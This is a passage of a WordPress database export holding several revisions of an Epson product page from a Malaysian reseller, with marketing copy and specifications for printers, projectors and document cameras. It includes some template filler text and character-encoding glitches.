src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<ul><li>Â </li></ul><ul><li>Â </li></ul><h3>INK TANK SYSTEM</h3><ol><li>Â </li></ol><h3>LASER PRINTER</h3><ol><li>Â </li></ol><p>2.</p><p>3.Â </p><h3>POS PRINTER</h3><ol><li>Â </li></ol><ul><li>Â </li></ul><ul><li>Â </li></ul><h3>Â </h3><ul><li>Â </li></ul><p>2.Â 3.Â </p><h1>Projectors for Work</h1><p>Epson has the best projector for your business, from education solutions to conference room projectors.</p><h3>Â </h3><ul><li>Â </li></ul><ul><li>Â </li></ul><ul><li>Â </li></ul><h3>Â </h3><h3>ULTRA PORTABLE</h3><ol><li>Epson EB-1785WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></li></ol><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul><h3>INTERACTIVE</h3><ol><li>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></li></ol><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><p>2.Â Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul><h3>HIGH BRIGHTNESS</h3><ol><li>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></li></ol><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul><p>2.Â Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul><p>3.Â Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul><h3>DOCUMENT CAMERAS</h3><ol><li>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></li></ol><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>To discover more, please click the button below or contact us to discuss your needs.</p><p>[maxbutton id=\"1\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 12:38:58','2018-12-24 04:38:58','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2751,1,'2018-12-24 12:59:29','2018-12-24 04:59:29','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p>Epson WorkForce Enterprise WF-C17590Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>Epson WorkForce Pro WF-C5290Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>Epson WorkForce WF-100Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>Epson WorkForce WF-7711Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>		\n			<h3>INK TANK SYSTEM</h3>		\n		<p>Epson EcoTank L3150Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><p>Epson L120 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul><p>Epson M1100 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n			<h3>LASER PRINTER</h3>		\n		<p>Epson AcuLaser C9300NÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul><p>Â Epson WorkForce AL-M320DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul><p>Epson WorkForce AL-M8100DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>		\n			<h3>POS PRINTER</h3>		\n		<p>Epson TM-H6000IVÂ </p><p>Â </p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><p>Epson TM-T88V-iÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul><p>Epson TM-T70IIÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>		\n			<h3>PHOTO PRINTER</h3>		\n		<p>Epson L1800 A3 Photo Ink Tank Printer</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul><p>Epson L850 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><p>Â </p><p>Epson L805 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p>Epson EB-2055<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><p>Epson EB-2142WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul><p>Epson EB-L500WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p>Epson LightScene EV-105</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><h3>ULTRA PORTABLE</h3><p>Epson EB-1785WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>		\n			<h3>INTERACTIVE</h3>		\n		<p>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><p>Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul><p>Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul><p>Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul><h3>DOCUMENT CAMERAS</h3><p>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>To discover more, please click the button below or contact us to discuss your needs.</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 12:59:29','2018-12-24 04:59:29','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2752,1,'2018-12-24 12:59:59','2018-12-24 04:59:59','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p>Epson WorkForce Enterprise WF-C17590Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>Epson WorkForce Pro WF-C5290Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>Epson WorkForce WF-100Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>Epson WorkForce WF-7711Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>		\n			<h3>INK TANK SYSTEM</h3>		\n		<p>Epson EcoTank L3150Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><p>Epson L120 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul><p>Epson M1100 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n			<h3>LASER PRINTER</h3>		\n		<p>Epson AcuLaser C9300NÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul><p>Â Epson WorkForce AL-M320DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul><p>Epson WorkForce AL-M8100DNÂ <img 